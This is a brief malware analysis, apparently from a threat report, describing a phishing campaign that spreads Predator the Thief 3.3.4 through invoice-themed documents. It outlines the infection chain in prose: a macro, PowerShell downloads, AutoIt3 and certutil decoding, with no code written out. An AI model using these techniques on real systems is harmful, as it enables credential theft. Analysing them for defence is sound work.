A new release of the malware known as Predator the Thief, labeled as version 3.3.4. There have been small development differences between each minor version, making this latest version very different from previous versions. It is active from as early as December 2019. The recent campaign uses phishing documents designed to look like invoices, all pushing the same payload of Predator the Thief.
Infection chain of Predator the Thief
nce the document is opened the malware performs the following operations:
1. AutoOpen macro runs the malware VBA script.
2. It downloads three files through PowerShell.
3. It then uses a legitimate AutoIt3.exe to run decoded AutoIt script.
“SevSS.data” is decoded by certutil.exe, a legitimate command line program that is part of the Certificate Service in Windows. The script is then run to decrypt apTz.dat into the payload of Predator the Thief.